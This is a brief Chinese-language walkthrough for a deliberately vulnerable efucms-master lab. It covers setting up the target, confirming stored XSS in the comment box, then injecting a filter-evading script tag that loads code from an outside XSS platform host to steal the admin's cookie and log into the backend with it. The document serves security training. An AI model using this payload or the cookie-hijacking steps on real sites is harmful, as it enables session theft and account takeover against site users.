阿里云盘分享资源链接
一、搭建efucms-master靶场
1.config.php更改为数据库的账号密码
htaccess的文件内容也要改一下啦!
2.小皮XP上安装phpMyadmin
- php的版本一定要是5.5.9
3、整一个数据库
- 新建数据库
- 导入efucms.sql
攻击机:
二、进入搭建的数据库测试
1、
- http://靶机IP地址/efucms-master/ 不能用IE,Eage打开,我用的火狐啦
- 打开评论测试弹窗测试漏洞 <script>alert(111)</script>
2、XSS注入
- XSS平台-XSS安全测试平台 XSS创建项目,复制注入获取cookie的代码</tExtArEa>'"><sCRiPt sRC=//xss.yt/SUfY></sCrIpT>
4、登录efucms后台(提前信息收集好的后台admin)
5、XSS项目中查看获取的cookie
- 回到http://靶机IP地址/efucms-master/页面
- F12
- 输入URL和cookie
这样就直接登陆啦!